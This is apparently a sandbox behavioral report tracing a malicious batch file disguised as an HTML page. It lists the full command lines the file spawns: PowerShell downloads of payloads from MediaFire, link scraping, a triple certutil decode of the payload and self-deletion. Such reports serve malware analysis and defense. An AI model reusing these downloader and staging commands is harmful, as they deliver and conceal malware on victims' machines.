ZeroBOX

Behavioral Analysis

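Process tree (each entry gives the image name and full command line; the number on the line below it is that process's PID)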

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iyfsPiQmGGeVn" C:\Users\test22\AppData\Local\Temp\impactfulbrands.co.uk__________________________________________.html.bat

    2552
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\impactfulbrands.co.uk__________________________________________.html.bat

      2624
      • powershell.exe powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://www.mediafire.com/file/uq6estxvdnk3zze/ofeduqin1.rar/file'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\test22\AppData\Local\Temp\weba.html', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }"

        2840
      • powershell.exe powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://www.mediafire.com/file/hzktcfc598wc4c7/bipucowova2.rar/file'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\test22\AppData\Local\Temp\webb.html', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }"

        2940
      • cmd.exe C:\Windows\system32\cmd.exe /c find "https://download" C:\Users\test22\AppData\Local\Temp\weba.html | find /i ".rar"

        3044
      • cmd.exe C:\Windows\system32\cmd.exe /c find "https://download" C:\Users\test22\AppData\Local\Temp\webb.html | find /i ".rar"

        2100
      • powershell.exe powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://download2275.mediafire.com/j1wfd498a9kgLf3itD5hwAm6GnB3TusSTZTc-mMhVvYN0hqwTQjJQ_hx8vgk3fcKOnDmVLRUteddrj73aOXA_Edxuym5EabDMzK_5X7yVYmIbgLFneKrfI2j3kF0iKqyYl0a_Z_m15qv351FgpQdY81ekwmLjEjQ4mvXkBuJmCO1hFQ/uq6estxvdnk3zze/ofeduqin1.rar'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\test22\AppData\Local\Temp\playvideoa.a', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }"

        2260
      • powershell.exe powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://download2280.mediafire.com/gz03sbm5gh5g44MooGxCNLMCcMyIm4BOqLSx4UrogWrZG41rW7VDf8OqrrlhRfdehhZ-hfT7jlPw29vnZnH6xlDoFSCu0tNkT7Ht5v8HV1Bnaxlx3DTHaBrI291FxT3JffMDP6Z7nT2_i3vfiuQHn2S352byuVCUHH7QtsvDi1I7OA/hzktcfc598wc4c7/bipucowova2.rar'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\test22\AppData\Local\Temp\playvideob.f', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }"

        2572
      • powershell.exe powershell -Command "& { $request = [System.Net.WebRequest]::Create($env:url); $request.Method = 'GET'; $request.Referer = $env:referer; $request.UserAgent = $env:userAgent; $response = $request.GetResponse(); $stream = $response.GetResponseStream(); $reader = New-Object System.IO.StreamReader($stream); $content = $reader.ReadToEnd(); $reader.Close(); $response.Close(); }"

        2780
      • certutil.exe certutil -decode C:\Users\test22\AppData\Local\Temp\playvideoa.a C:\Users\test22\AppData\Local\Temp\playvideoa.b

        2824
      • certutil.exe certutil -decode C:\Users\test22\AppData\Local\Temp\playvideoa.b C:\Users\test22\AppData\Local\Temp\playvideoa.c

        2880
      • certutil.exe certutil -decode C:\Users\test22\AppData\Local\Temp\playvideoa.c C:\Users\test22\AppData\Local\Temp\playvideoa.d

        2972
      • cmd.exe CMD /C DEL C:\Users\test22\AppData\Local\Temp\impactfulbrands.co.uk__________________________________________.html.bat

        2104
